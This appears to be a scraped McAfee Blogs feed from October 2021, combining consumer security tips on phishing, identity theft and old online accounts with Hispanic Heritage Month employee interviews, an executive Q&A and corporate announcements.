A good offense is the best way to defend yourself against would-be criminals out to grab and misuse your data. Offensive tactics and habits include using strong passwords, maximizing privacy settings on social networks, using a VPN, and boosting security on the many IoT devices throughout your home 

4. Deep clean your digital house. 

Get in the habit of deep cleaning your technology and bring your kids into the routine. Here’s how: 

  •  Together, remove unused apps from all devices
  •  Add Two-Factor Authentication (2FA) to your account passwords
  •  Update all device software
  • Wipe social profiles (including posts) clean of personal or family information such as full names, school name, birthdate, age, address, phone number, email, or location patterns. Do it together and even throw in a few rewards.  

October: Level up family cybersecurity  

It’s hard to slow down and get serious about online privacy if you’ve never experienced a breach or online theft of some kind. However, chances are, the dark side of online living will impact your family before long. Ready to go deeper? Dig into these cyber security tips for every age and stage. 

The post 5 Ways to Get Kids Focused on Their Online Privacy appeared first on McAfee Blogs.

Don’t Let Old Accounts Haunt You: How to Maintain Your Digital Graveyard Tue, 12 Oct 2021 23:25:29 +0000

What was the first online service that you signed up for? Perhaps it was your middle school email address (“”...

The post Don’t Let Old Accounts Haunt You: How to Maintain Your Digital Graveyard appeared first on McAfee Blogs.


What was the first online service that you signed up for? Perhaps it was your middle school email address (“” anyone?) or your very first Tumblr or Myspace account. Whatever it was, it’s likely that you haven’t used these accounts in years — but did you ever actually delete the account?  

Over the past decade, you’ve likely collected various online accounts that you no longer use. But just because you stop using an account doesn’t mean that it doesn’t exist — and your data is likely still floating around on the World Wide Web. These old “zombie” accounts haunt your digital graveyard and are easy pickings for cybercriminals.   

The Haunting of Accounts Past 

Today, most websites and apps either require or strongly encourage their visitors to create user accounts. Almost always, exchanging an email address for an exclusive offer seems a fair tradeoff.  As a result, consumers quickly accumulate accounts, many of which they may not even remember creating.  

According to Digital Guardian, 70% of consumers have more than 10 password-protected online accounts, and 30% have too many to keep track of. These accounts are comprised of free trials, stores that you no longer purchase from, one-time accounts that you create to buy something, gaming platforms, and apps that you only used a few times. While they may have once served a purpose, you no longer need them.   

The problem with zombie accounts is that they contain credentials at risk of exposure. Say that you sign up for a free week trial of a meal kit delivery service. When creating your account, you include information like your email address, password, phone number, delivery address, and credit card information. Once your trial expires, you decide not to sign up for a membership, but your account information remains online. If the meal kit company is involved in a data breach, your personal data could be leaked and exploited by cybercriminals. And if you happen to reuse the same credentials across multiple accounts, a criminal could use credential stuffing techniques (where they use email and password combinations to hack into online profiles) to break into your other accounts.  

How to Gain Control of Your Data  

So, how can you keep protect your online data and prevent a zombie account apocalypse? Follow these cybersecurity best practices to help keep your information secure:  

Track down and close old accounts 

Don’t remember which accounts you made and no longer use? No worries! If you browse with Google Chrome, check under chrome > settings > passwords. This will show all the accounts and passwords you’ve used and saved. Other browsers like Firefox and Safari have similar settings. If you use a password manager, this will also keep a record of your credentials. Once you’ve identified the online accounts you no longer used (or completely forgot you had), close the account for good! This may take some patience, as some websites require multiple steps to close an account. But it will be worth knowing that your information is safer from online exposure.  

Make sure all your passwords are strong and unique 

Having a strong, unique password for each of your online accounts helps protect them from credential stuffing. By using different passwords for your online accounts, you can take comfort in knowing that the majority of your data is secure if one of your accounts is vulnerable.   

Update your credentials when necessary 

If you realize a company you buy from fell victim to a data breach, start investigating. A tool like McAfee Identity Protection Service can help you monitor multiple email addresses that allow you to see if you were impacted by a breach. If your credentials were potentially exposed, update them on the company’s website immediately.  

Use multifactor authentication 

Multifactor authentication is an online safety measure where more than one method of identity verification is needed to access the valuable information that lies within password-protected accounts. This can prevent a criminal from breaking into your online profile by providing an added layer of security.  

Invest in protection 

McAfee Total Protection will help protect your personal information and privacy and provides identity restoration services and invaluable peace of mind. Ninety-two percent of Canadians are concerned about the protection of their privacy and 37% are extremely concerned, reports the Canadian Centre for Cybersecurity. All it takes is a few changes to your online habits and arming yourself with the right tools to feel secure about your online presence.  

The post Don’t Let Old Accounts Haunt You: How to Maintain Your Digital Graveyard appeared first on McAfee Blogs.

2021 Hispanic Heritage Month Pt. 5: A Celebration of Hispanic Heritage and Hope Tue, 12 Oct 2021 15:00:32 +0000

We’re closing McAfee Enterprise’s Hispanic Heritage Month with Solutions Architect, Gus Arias. Read the full interview below to see how...

The post 2021 Hispanic Heritage Month Pt. 5: A Celebration of Hispanic Heritage and Hope appeared first on McAfee Blogs.


We’re closing McAfee Enterprise’s Hispanic Heritage Month with Solutions Architect, Gus Arias. Read the full interview below to see how his heritage impacted his life and career in technology.

What do you enjoy most about your heritage and what is one of your favorite memories growing up?

I love the food and music.  To this day I never get tired of eating Arepas, a staple of my Venezuelan heritage.

Tell us about your journey to a career in technology and how your heritage played a role to where you are today?

I’ve always liked technology and I took a leap into IT from the Mortgage Industry. I stayed hungry for knowledge and am always eager to learn which transformed my cybersecurity career to where it is today.

What do you hope to pass on to future generations?

I want future generations to know that it is never too late to learn something new, and you should strive to learn something new every day.

What are the three most important things that people should know about your culture?

  1. Family oriented (Family takes care of family)
  2. We are very festive (any chance we get we will throw a party)
  3. A night of having family and friends over will turn out into a cookout and game night of playing dominos

What types of foods were cooked for special occasions when you were growing up?

Arepas, Mandocas, Hayacas, and Paella

Is there a tradition or celebration that you hope that your descendants maintain?

I would have to say our Christmas celebrations throughout the month of December.

As the country continues to grow more diverse, what advice would you give to young Hispanic/LatinX individuals interested in starting a career in cybersecurity?

Do not let anything hold you back and when it comes to change, have an open and positive view. Learn from those changes to improve, also work on soft skills. From a technology perspective – keep up with the times. Meaning, stay informed on the evolution of technology and threats.

What are some of your ideas on how to attract more Hispanic/LatinX individuals to cybersecurity?

Educate and promote early by engaging with local schools. Also, provide internships at the High School/College levels as a summer program.

The post 2021 Hispanic Heritage Month Pt. 5: A Celebration of Hispanic Heritage and Hope appeared first on McAfee Blogs.

2021 Hispanic Heritage Month Pt. 4: A Celebration of Hispanic Heritage and Hope Mon, 11 Oct 2021 15:00:09 +0000

Although Hispanic Heritage Month is coming to an end on October 15th, it doesn’t mean we have to stop celebrating...

The post 2021 Hispanic Heritage Month Pt. 4: A Celebration of Hispanic Heritage and Hope appeared first on McAfee Blogs.


Although Hispanic Heritage Month is coming to an end on October 15th, it doesn’t mean we have to stop celebrating our employee’s and learning about their heritage and what led them to their career in cybersecurity. Take a look at the conversation below with McAfee Enterprise, Joyce Moros-Nahim, LTAM Legal Director

What do you enjoy most about your heritage and what is one of your favorite memories growing up?

What I enjoy the most about being Hispanic is that we are very amiable. We are always exited to meet new people and have new experiences. One of my favorite memories growing up is all the time I spent with my family. It was never something my parents had to force my brother and I to do. We were always happy to hang out with our cousins, have lunch with our “abuelitos” (grandparents), and celebrate with our very large family.

How have Hispanic/LatinX individuals helped contribute to where you are today in life and career?

I have met and worked closely with many Hispanic and LatinX individuals and their enthusiasm and dedication for their chosen career along with their zest for life has taken them very far in both their home country and around the world. This has inspired me to keep pushing and take on every day with positivity and joy.

Why were you interested in a career in technology and how has your heritage played a role in where you are today?

I have always been interested in the technology industry because it changes every day and will be more prevalent as we move into the future. Having been born in a Latin American country (Venezuela), I was always intrigued in seeing how other countries evolved in this industry.

What do you hope to pass on to future generations?

I hope that future generations will continue to appreciate and partake in their cultural traditions. No matter which country a Latinx individual is from, they’re typically very family oriented, respectful, hardworking, and loving; which I hope will continue in future generations.  

What family traditions did you have growing up?

Visiting my grandmothers almost every day and having a Cafecito.  On Sundays, we would also go to church in our Sunday best and have lunch with the whole family. I always enjoyed this time because I would see my whole family and hear about their week. It kept us spiritually and physically united.

What are the three most important things that people should know about your culture?

Venezuelans are extremely hospitable, hardworking, and love to befriend people with different nationalities.

Define and describe the most important (or most celebrated) holiday of your culture.

The most celebrated holiday in my culture is New Year’s Eve. The families get together and have “hallacas” and pan de jamon, two traditional Venezuelan meals. As it is about to strike 12 AM, we each eat 12 grapes, symbolizing 12 wishes or resolutions we have for the upcoming year. Once it’s 12 AM, we all embrace and celebrate what is to come!

As the country continues to grow more diverse, what advice would you give to young Hispanic/LatinX individuals interested in starting a career in cybersecurity?

My advice to a young Hispanic/Latinx individual would be to gain experience in the field and to find a mentor with a similar heritage to guide and inspire you.

What are some of your ideas on how to attract more Hispanic/LatinX individuals to cybersecurity?

A great way to attract more Hispanic/LatinX people to cybersecurity is to have programs in Latin American countries that will teach children about technology and how it’s key in our everyday life.

The post 2021 Hispanic Heritage Month Pt. 4: A Celebration of Hispanic Heritage and Hope appeared first on McAfee Blogs.

Staying safer online from phishing and other social engineering attacks Mon, 11 Oct 2021 13:27:10 +0000

When you’re online, the world is at your fingertips. You can do amazing things like stream the latest movies while they’re still in theaters! Or...

The post Staying safer online from phishing and other social engineering attacks appeared first on McAfee Blogs.


When you’re online, the world is at your fingertips. You can do amazing things like stream the latest movies while they’re still in theaters! Or you can enjoy the convenience of online shopping and avoiding the DMV by renewing your driver’s license remotely.  This is possible because we’re able to communicate with these organizations through many different channels and we trust them. Unfortunately, many bad actors have taken advantage of this trust and the ease of communication to up their game when it comes to social engineering.  

What is social engineering? One of the more famous examples of social engineering was the Nigerian Prince email scam. In this example, hackers relied on a novel, too-good-to-be-true story of a prince looking to transfer some of his fortune if only he could use your bank account number. The Nigerian Prince is a running joke these days, the internet version of “if you believe that, then I have a bridge to sell you,” but its original success made scammers realize they were onto something big.  

Modern social engineering campaigns closely resemble communications from legitimate organizations. They’re carefully designed, may be grammatically correct, and appear in completely plausible scenarios. However, they’re all after the same thing – information to gain access to an organization or individual’s accounts.  

Phishing is common form of social engineering 

Phishing is a type of social engineering that uses email or websites to convince people to give up their personal information, under the guise of a plausible reason. Instead of a Nigerian prince asking for a bank account number, an email posing as your bank may ask for you to confirm your account information. Often these emails are tied to circumstances that demand your attention and reflect a sense of urgency. Needless to say, many recent phishing scams have played into COVID-19 pandemic fears and economic concerns. Here are a few other scams related to phishing to watch out for: 

  • Vishing refers to phone calls trying to get information from people. Think cruise ship vacations and car warranties and you’re on the right track. Chances are you’ve gotten a robocall that qualifies as vishing 
  • Smshing is the text version of a phishing campaign. These messages are especially malicious as they may have links that take you to fake web pages or dial a phone number.  

Here’s how to identify a phishing campaign in a few easy steps 

First, does the message you’ve received contain any of the following: 

  • Notification of suspicious activity or log-in attempts 
  • A claim that’s there’s a problem with your account or your payment information 
  • Request to confirm personal information 
  • fake invoice 
  • A link to make a payment 
  • Says you’re eligible to register for a government refund 
  • A coupon for free stuff 

If so, check for these tell-tale signs used by phishing scams 

  • A sender address that’s just slightly off – Cybercriminals addresses that closely resemble ones from a reputable company with just a few alterations of letters or other characters.  
  • Lack of personalization – Generic greetings that don’t reference your name or email address may be an indicator of a phishing email. 
  • Hyperlinks and site addresses that don’t match the sender – Hover your mouse over the hyperlink or call-to-action button in the email. Is the address shortened or is it different from what you’d expect from the sender? It may be a spoofed address from the  
  • Spelling and layout – Strange grammar and less-than-polished email layouts can be obvious signs that this is a scam email impersonating a large company.  
  • Attachments – Be wary of any attachment in an email. Attachments are great way to deliver viruses and malware to your device. 

If the email you’re suspicious of has several of the above warning signs, chances are you’ve spotted a phishing email. Still not sure what we’re talking about? Check in your email’s spam and you’ll probably see some obvious examples of phishing right away. Spam doesn’t catch everything though, and the best phishing scams can be very difficult to separate from the legitimate emails. With that in mind, we’ve pulled together some safety precautions that will help keep you safer, from phishing emails. 

Preventing and avoiding phishing scams 

  • Confirm the source. Unsolicited phone calls, visits, or emails are best avoided altogether or confirmed with a second source. Verify the sender or caller’s identity with the organization they claim to represent. Use contact information from a previous communication you know to be legitimate. 
  • Keep personal information private over email. Don’t reveal personal or financial info over an email or do so by following links provided in an email. 
  • Install and maintain online protection, like McAfee’s Total Protection. This kind of protection includes firewalls and even web browsing advisors to help you reduce spam and verify sites.  
  • Take advantage of email client and web browser antispam and link verification features. 
  • Use multi-factor authentication and a password manager to ensure even if your login information is stolen, scammers can’t access your accounts. 

The post Staying safer online from phishing and other social engineering attacks appeared first on McAfee Blogs.

Shaping the Future of Cybersecurity Fri, 08 Oct 2021 20:04:12 +0000

Today marks a significant and exciting step forward for the combined McAfee Enterprise and FireEye businesses as we create a...

The post Shaping the Future of Cybersecurity appeared first on McAfee Blogs.


Today marks a significant and exciting step forward for the combined McAfee Enterprise and FireEye businesses as we create a pure play, cybersecurity market leader.

I’m incredibly proud to be writing this as the newly appointed CEO of this combined business. Keeping nations and large enterprises safe is – I believe – one of the most important challenges facing the world today. We have already started working together to bring together the best of McAfee Enterprise and FireEye. Together, we see vast opportunities to develop an integrated security platform powered by artificial intelligence, machine learning, and automation that will offer an unbeatable security portfolio to protect customers across endpoints, infrastructure, applications, and in the cloud. With our combined energies, we will be able to bring these solutions to market faster, and with greater innovation than before.

And we will do this because of our incredibly talented team. Together, we have 5,000 of the best security professionals who have already been working tirelessly to protect our customers. I am energized about bringing together these two teams to relentlessly protect the world from cyberattacks. Our new company culture will be focused on continuing to deliver on this vision, particularly for our customers.

As a combined business, we have over 40,000 customers, including many of the most well-known businesses in the world. And supporting our customers to be more resilient and stay one step ahead of adversaries has always been a priority – that’s why the majority of our enterprise and government customers have worked with our companies for over 16 years. We are committed to continuing to deliver excellence to our customers through this integration.

Today is a monumental day for everyone in this team. It is also a monumental day for the future of threat detection, protection, and response. Together, we will deliver a new model that creates solutions that work together, in a continuous fashion, to secure our customers across the full attack continuum. We are already seen as market leaders, now our story keeps getting better.

The post Shaping the Future of Cybersecurity appeared first on McAfee Blogs.

2021 Hispanic Heritage Month Pt. 3: A Celebration of Hispanic Heritage and Hope Thu, 07 Oct 2021 15:00:38 +0000

Did you know, the timing of Hispanic Heritage Month coincides with the Independence Day celebrations of several Latin American nations?...

The post 2021 Hispanic Heritage Month Pt. 3: A Celebration of Hispanic Heritage and Hope appeared first on McAfee Blogs.


Did you know, the timing of Hispanic Heritage Month coincides with the Independence Day celebrations of several Latin American nations?

At McAfee Enterprise, we’re celebrating Hispanic Heritage Month by recognizing some of our amazing employees and asking them about their heritage and the impact it had on their career and journey to cybersecurity. Read my conversation with Zuly Gonzalez below on how her family and culture have impacted her career.

What do you enjoy most about your heritage and what is one of your favorite memories growing up?

My parents moved to mainland US when I was young. During the summers, we’d go on vacation to Puerto Rico and one of my fondest memories growing up are the plane flights to/from Puerto Rico. This was before 9/11, when flying wasn’t what it is today. My sisters and I would keep ourselves entertained playing games. It was an adventure for us and the highlight was always a warm chicken or pasta meal.

What family traditions did you have growing up?

We had two Christmas celebrations, which as a kid, you can’t ask for anything better! We celebrated Christmas on the 25th, which was the big event where we got most of our presents. Then on January 6 we’d celebrate “Día de Reyes” (Three Kings Day) where we would get a few more presents.

What are the three most important things that people should know about your culture?

I’d say three things that are central to Puerto Rican culture are: family, God, and passion/hard work. Puerto Ricans believe in traditional family values. Religion plays an important part in our culture. And the Puerto Rican passion is hard to understate. I have to be careful, because a lot of times my passion leads me to speak very loudly, which can sometimes be misinterpreted by non-Hispanics as anger or aggression, when in fact, it’s just excitement. I saw a T-shirt recently that said, “I’m not yelling. I’m Puerto Rican.” This is so true!

Describe your favorite traditional dish, and how it was prepared. Who usually prepared it for family meals?

One of my favorite dishes growing up, because we didn’t have it often, was sancocho. It’s a rich, comfort soup made with root vegetables and other starchy vegetables common in Puerto Rico. Ingredients include ñame, yautia, pana, papas, platanos, guineos, maiz, and batatas, among other things. A few of the ingredients are hard to find in the US, and when you do find them, are expensive, so we didn’t have it often growing up. But when my mom did make it, it was always a treat!

How have Hispanic individuals helped contribute to where you are today in life and career?

My parents were by far the biggest influence in my life. They taught me that I could be and do anything I wanted in life. They didn’t set limits for what I could achieve and taught me that with hard work anything is possible.

I followed my father’s footsteps by pursuing a career in STEM and attending the same university he attended. In fact, thinking about it now as I answer this question, I think that even more so than my mom, my dad had the biggest influence on who I am today as an individual. He shaped a lot of my personality, my beliefs, and a lot of the decisions I’ve made in my life, both personally and professionally.

Tell us about your journey to a career in technology and how your heritage played a role to where you are today?

Family values are very important in Puerto Rican culture. My dad was a math teacher and growing up he was always ready to help me with my homework. During the summer trip to Puerto Rico before I graduated high school, we took a tour of the university my dad went to. I ended up going to that university, which set me on the path to where I am today in my career. I obtained a degree in Computer Engineering and a co-op opportunity (similar to an internship) at NSA. NSA led me to a career in cybersecurity. At NSA I met Beau Adkins, who later turned into my partner in life and in business. Beau and I founded Light Point Security, which ultimately led us to McAfee Enterprise. But it all started with my parents. Without my parents’ motivation, support, and ultimate push to attend the University of Puerto Rico, I wouldn’t be where I am today.

As the country continues to grow more diverse, what advice would you give to young Hispanic individuals interested in starting a career in cybersecurity?

Same advice I’d give any young person interested in any career path. That is – look for ways to learn outside of a traditional school setting. Getting a hands on experience is so important. First, it shows initiative and passion. Second, to use an analogy: Reading and memorizing a cooking recipe, and even knowing the history behind each ingredient, isn’t necessarily going to translate into a delicious meal, it takes practice. Practice with the equipment, practice with the ingredients, and sprinkle in your own creativity to make an expert dish. One that people will pay money for!

The post 2021 Hispanic Heritage Month Pt. 3: A Celebration of Hispanic Heritage and Hope appeared first on McAfee Blogs.

How to Check if Someone is Using Your Identity Tue, 05 Oct 2021 23:00:39 +0000

A good time to check if someone is using your identity is before it even happens.  One of identity theft’s several downsides is how people discover they’ve...

The post How to Check if Someone is Using Your Identity appeared first on McAfee Blogs.


A good time to check if someone is using your identity is before it even happens. 

One of identity theft’s several downsides is how people discover they’ve become a victim in the first place—by surprise. They go to rent an apartment, open a line of credit, or apply for financing, only to discover that their finances or reputation has taken a hit because of identity thief.  

And those hits add up, particularly when you look at the dollars involved. In 2020, the Federal Trade Commission (FTC) reported $3.3 billion in financial losses from 4.7 million reported cases of fraud, a 45% increase over the year prior. Of those reports, identity theft was the leading fraud category, accounting for 29% of fraud incidents.  

What’s at risk?  

Plenty. Depending on the type and amount of information an identity thief gets their hands on, they can harm your finances and reputation in several ways, including: 

  • Open utility accounts in your name 
  • Use your credit cards for purchases 
  • Hijack your email 
  • Claim healthcare expenses under your insurance 
  • Steal your tax refund
  • Even use your identity when they’re arrested for a crime 

Rather than ending up with a rude and potentially costly surprise of your own, you can get ahead of thieves by checking to see if someone is using your identity before it’s a problem or before it really takes root. 

The Neiman Marcus breach: now is a good time to check your identity 

Major data breaches that expose personal information seem to hit the headlines with some regularity, not to mention the many, many more that don’t get national or international press coverage. Most recently we have the Neiman Marcus breach, where this major retailer alerted 4.6 million customers that “an unauthorized party obtained personal information associated with certain Neiman Marcus customers’ online accounts.”  

And as it is with many such breaches, it took quite some time before the theft of information was discovered. Per Neiman Marcus, it’s believed that the breach occurred in May 2020 and only discovered in September of 2021. Potentially compromised information included: 

  • Names and contact information 
  • Payment card numbers and expiration dates (without CVV numbers) 
  • Neiman Marcus virtual gift card numbers (without PINs) 
  • Usernames, passwords, and security questions of Neiman Marcus online accounts 

Whether or not you have reason to suspect that your information got caught up in this recent large-scale breach, it serves as a good reminder that any time is the right time to check up on your identity. Acting now can save headaches, potentially big headaches, later. 

How you can protect yourself from identity theft right now 

Quite a bit of identity theft prevention begins with taking stock of the accounts and services you have in your name. This ranges anywhere from bank accounts to public utilities and from credit cards to loans, all of which contain varying degrees of personal information about you. With a sense of where your personal identity is being used, you can better look for instances where it’s being misused. 

Ways you can spot for possible identity theft include: 

Track your bills and when they are due. 

If you stop receiving a bill that normally comes to you, such as a utility bill or for a department store credit card, that could be a sign that a thief has changed the mailing address and has potentially hijacked your identity. 

Check your statements and accounts for irregularities.

This is rather straightforward, yet it reminds us how important it is to look at our statements closely. Charges that you didn’t ring up or that seem slightly higher than normal are a surefire sign that you should follow up with the bank or company involved and let them know of possible fraud. 

Review your credit reports. 

In the U.S., you have annual access to free credit reports from the major credit reporting agencies. Not only will this give you a sense of your credit score, but it will also show the credit that’s open in your name, along with addresses associated with your identity. Spotting an account that you haven’t signed up for or seeing an address of a residence that you’re not renting are other common signs that your identity may have been compromised. 

Sign up for credit monitoring services. 

With the number of accounts many of us have these days, a credit monitoring service can help you stay on top of what’s happening in your name. Often offered through banks, credit unions, and even insurance providers, credit monitoring can alert you in several instances, including: 

  • When a company checks your credit history. 
  • If new loan or credit card appears in your name. 
  • Changes in your address or phone number. 

Overall, credit monitoring can act as another set of eyes for you and spot potential identity issues. Different services provide different levels of monitoring, so consider reviewing a few options to find the one that works best for you. 

Consider an identity protection service.

One like our own Identity Protection Service will monitor several types of personally identifiable information, alert you of potentially stolen personal info, and offer guided help to neutralize the threat—in addition to offering several preventative steps to help keep theft from happening in the first place. With this set up on your computers and smartphone you can stay in the know and address issues immediately. 

Five extra steps for preventing identity theft 

Along with keeping an eye on what’s happening with your identity online and elsewhere, there are a few more things you can do to make it tougher for thieves to steal your identity. 

1) Protect your digital files and devices. 

Given all the banking and shopping we do on our computers and phones, installing and using comprehensive online protection software is a must these days. It puts several layers of security in place, such as creating complex passwords automatically, shielding credit card info from prying eyes, and protecting your privacy and data online by connecting with a VPN. In short, online protection software acts as a solid first line of defense. 

2) Protect your accounts with strong passwords and multi-factor authentication. 

As mentioned above, comprehensive online protection software often includes a password manager that can generate strong, unique passwords for each of your accounts and remember them for you. It’s extra protection that makes life a lot easier for you by managing all the accounts you’re juggling. Also, use MFA (multi-factor authentication) on the accounts that give you the option, which makes it harder for a thief to crack your accounts with a password alone. 

3) Shred sensitive documents when you’re done with them. 

Sensitive documents come in all forms. Top-of-the-line examples include things like tax returns, bank statements, and financial records. Yet there are also things like your phone and utility bills, statements from your doctor’s office, and offers that come to you via mail. Together, these things can contain personal information such as account numbers, your full Social Security Number, the last four digits of your Social Security Number (which can still be useful to thieves), and other information that may uniquely identify you. You’ll want to dispose of sensitive documents like these so that they can’t be harvested by hackers. 

For physical documents, consider the low-cost investment of a paper shredder to help ensure they don’t fall into the wrong hands when you are done with them. (And let’s face it, they’re fun to use!) For digital documents, simply deleting a file is not enough – online protection software is a great resource that often includes a digital document shredder, designed to render the data practically unusable when you’re ready to trash the file. 

4) Keep your Social Security Number to yourself. 

Your Social Security Number is one of the most prized possessions a thief can run away with because it is so closely associated with you and things like your tax returns, employment, and so on. Keep it stored in a safe location rather than on your person or in your wallet. Likewise, be careful about giving out your SSN. While organizations like the IRS, your bank, and employer require it, there are other organizations who do not—but may ask for it anyway. (Doctor’s offices are a prime example.) If you get such a request, ask them what they intend to use it for and then ask if another form of identification will work instead.  

5) Keep an eye out for phishing attacks. 

Phishing attacks are one of the primary ways identity thieves steal personal information. Whether they come via a direct message, on social media, or through email, text, or phone calls, thieves use them to harvest your personal info by posing as a legitimate organization—such as in this recent IRS phishing scam. Phishing is a topic all unto itself, and you can check out this quick read to see how you can spot phishing scams and protect yourself from them. 

No surprises 

Like any criminal, identity thieves do their dirtiest work in the shadows—quietly stealing money under your nose, or worse, as we outlined above. By shining a light on your identity and keeping regular track of what’s happening with it, you can spot unusual activity right away. Even the small stuff is important. A co-worker of mine once saw an incorrect address listed on his credit report. Turned out, that address was used to rack up several large charges at a retailer, which he was able to fix with the aid of the credit reporting agency and the retailer in question.  

No doubt about it. Identity theft is indeed on the rise, and your best bet to avoid such a nasty surprise is to keep an eye on your digital identity the same way you keep an eye on your actual wallet. 

The post How to Check if Someone is Using Your Identity appeared first on McAfee Blogs.

Executive Spotlight: Q&A with Vice President, Global Commercial, Britt Norwood Tue, 05 Oct 2021 16:37:47 +0000

Welcome back to our executive blog series, where I chat with some of the pivotal players behind McAfee Enterprise to hear...

The post Executive Spotlight: Q&A with Vice President, Global Commercial, Britt Norwood appeared first on McAfee Blogs.


Welcome back to our executive blog series, where I chat with some of the pivotal players behind McAfee Enterprise to hear their takes on today’s security trends, challenges, and opportunities for enterprises across the globe. Dive into the conversation below with Vice President, Global Commercial, Britt Norwood.

Q: What’s the first career you dreamed of having as a kid?

My first career was as a paper boy from 5th through 8th grade, but I always wanted to be a professional golfer. However, when I realized I was not that good at golf, I decided to pursue a career in business and technology.

Q: What do you think about talent in the technology and security industry? 

The talent we have in this industry is amazing, people are working so hard every day, but our foes are relentless, and we will always need talent who can look at problems with diverse viewpoints.

Q: Which emerging technology do you think holds the most promise once it matures?

I’m interested in seeing the continued progress around the unification of threat hunting (EDR, XDR, MDR), as we better understand the power of machine learning, automated detection, and AI as it pertains to quickly identifying malicious code and non-conforming behaviors. This is a world where the surface is just being scratched. As this technology matures and develops, there is power for good, but it will always need to be balanced in a way that makes sure the uses are ethical and moral. This will be a true new frontier as it unfolds.

Q: What are some of the trends you are currently noticing within the privacy and cybersecurity space? 

Everyone knows that a layered model is necessary to protect valuable data against attacks, but there is fatigue within many IT departments about the number of tools they need and that need to be connected to each other to work properly. Most CIOs and CISOs are looking for platforms that simplify management and streamline threat research to consolidate and reduce complexities.

On the attack front, both the cryptocurrency phenomenon is allowing bad actors to be more aggressive, as they have a way to anonymously launder ransoms, which is why there are so many ransomware attacks happening now. Cryptocurrency needs to be examined from a regulatory standpoint to protect innocent consumers and businesses who are vulnerable to such attacks. Until that time, it falls back to security platforms to assist them.


The post Executive Spotlight: Q&A with Vice President, Global Commercial, Britt Norwood appeared first on McAfee Blogs.

2021 Hispanic Heritage Month Pt. 2: A Celebration of Hispanic Heritage and Hope Tue, 05 Oct 2021 15:00:19 +0000

The nationally recognized Hispanic Heritage Month grew out of a desire to educate people all over the country about the...

The post 2021 Hispanic Heritage Month Pt. 2: A Celebration of Hispanic Heritage and Hope appeared first on McAfee Blogs.


The nationally recognized Hispanic Heritage Month grew out of a desire to educate people all over the country about the many contributions the Hispanic community has made to U.S. culture.

Here at McAfee Enterprise, we’re taking this year’s Hispanic Heritage Month to spotlight members of the LatinX community who are using their platforms to make their voices heard and contribute to the cybersecurity community. I spoke with Arnie Lopez, Vice President Worldwide Systems Engineering, about his heritage and journey to cybersecurity. 

What do you enjoy most about your heritage and what is one of your favorite memories growing up?

I love our food and music.  I remember my mom cooking up some great dishes while we danced around the house listening to fun music.

How have Hispanic/LatinX individuals helped contribute to where you are today in life and career?

I had two great LatinX mentors/role models, Carlos Dominguez and Guillermo Diaz that helped tremendously early in my career.

Tell us about your journey to a career in technology and how your heritage played a role to where you are today?

Our culture is hard working and sometimes very stubborn. Early in my career I was very interested in technology and asked people to teach me different types of technologies and would not take no for an answer. I started early on with learning computers, then servers, networking, security, then cloud and applications. All of this helped my career and had a huge impact.

What do you hope to pass on to future generations?

Embrace your LatinX culture, use it as a differentiator when competing for new roles.

What are the three most important things that people should know about your culture?

1) Our passion makes us great team members

2) We love to have fun… Work hard and play hard

3) We come in many different colors and sub-cultures but have common core values

Is there a tradition or celebration that you hope that your descendants maintain?

I hope my kids and nephews keep up the celebration of Bolivian Independence Day (Seis de Agosto).  It’s a big national party on August 6 every year with music, food and dancing.

As the country continues to grow more diverse, what advice would you give to young Hispanic/LatinX individuals interested in starting a career in cybersecurity?

Don’t be intimated by the lack of LatinX in Cyber, it’s up to us to change the demographics and we will do it. Find a LatinX mentor or coach that already works in Cyber to provide you candid and honest feedback and guidance.

What are some of your ideas on how to attract more Hispanic/LatinX individuals to cybersecurity?

Get involved, participate, and give back. Get involved in LatinX youth, corporate and University panels and events and tell your story.  “If they can SEE it, They can BE it!”

The post 2021 Hispanic Heritage Month Pt. 2: A Celebration of Hispanic Heritage and Hope appeared first on McAfee Blogs.

McAfee Enterprise Is Ready for Windows 11, Are You? Tue, 05 Oct 2021 15:00:03 +0000

McAfee Enterprise is prepared to protect our customers from day 1 of their journey with the new Windows 11 release....

The post McAfee Enterprise Is Ready for Windows 11, Are You? appeared first on McAfee Blogs.


McAfee Enterprise is prepared to protect our customers from day 1 of their journey with the new Windows 11 release.

This summer Microsoft announced planned changes to its Windows platform with the release of Windows 11. McAfee Enterprise is proud to announce that we have delivered day 1 support for the benefit of our current and future customers. We know that today’s hybrid workspaces call for flexibility and ease of use without compromising security, so now that Windows 11 is here, we want to address a few important topics regarding what to expect from your trusted security vendor, McAfee Enterprise:

What does McAfee Enterprise day 1 support of Windows 11 mean to you?

Customers can rely on McAfee Enterprise products to already have the most important Windows 11 box checked—ensuring your systems are secure and protected against threats from day 1.

McAfee Enterprise is committed to continue this same level of support for Microsoft’s future release cadence of Windows 11. We work closely with Microsoft to make sure that McAfee Enterprise security software and hardware products are fully compatible with Windows operating systems.

What if my organization is not ready to upgrade to Windows 11?

We recognize that not every environment will be ready to upgrade on day 1, or even at the start of the new year. Regardless of the date of your transition, McAfee Enterprise is here to ensure you remain protected across your devices and OS versions.

Our ongoing commitment is to continue to support our customers and the release cadence of the Windows 10 platform. We keep apprised of Microsoft OS support cycles and ensure that our customers remain covered throughout their lifecycles. For more information, see KB85784 – Windows 10 compatibility with McAfee Enterprise products

That said, having a plan outlined in advance is a key ingredient to any successful environment upgrade or transition. McAfee Enterprise Technical Support and your Enterprise Customer Success teams are available to support and partner with you on your journey and to answer any product questions along the way.

Related resources:

What is an ideal security environment for McAfee Enterprise customers utilizing the new Windows 11 OS?

With McAfee Enterprise’s security platform, you can command a centrally managed solution that protects your environment across varied devices and operating systems. A combination of fully enabled Endpoint Security Adaptive Threat Protection (ENS ATP),  EDR, and MVISION Insights delivers proactive threat intelligence and defenses across the entire attack lifecycle. Our security teams work around the clock to anticipate future security needs and drive home industry-leading innovation. More on the McAfee Enterprise Endpoint Protection Platform here.

Additional product resources:

Where can I find documentation regarding McAfee Enterprise product support for the new Windows 11 release?

Our product teams have outlined our portfolio’s support in KB94901 – Windows 11 compatibility with McAfee Enterprise products.

To ensure a quality experience, each McAfee Enterprise product team is required to complete validations of all new releases that Microsoft publishes for Windows 11. The McAfee Enterprise goal is to add same-day support for all Windows 11 releases over time, for those products that don’t currently offer this cadence.

For general upgrade guidance or questions, customers may contact Enterprise Technical Support or visit our Support Portal here.

Take advantage of our latest Endpoint Security offering by visiting us here.

The post McAfee Enterprise Is Ready for Windows 11, Are You? appeared first on McAfee Blogs.

2021 Hispanic Heritage Month Pt. 1: A Celebration of Hispanic Heritage and Hope Mon, 04 Oct 2021 18:25:59 +0000

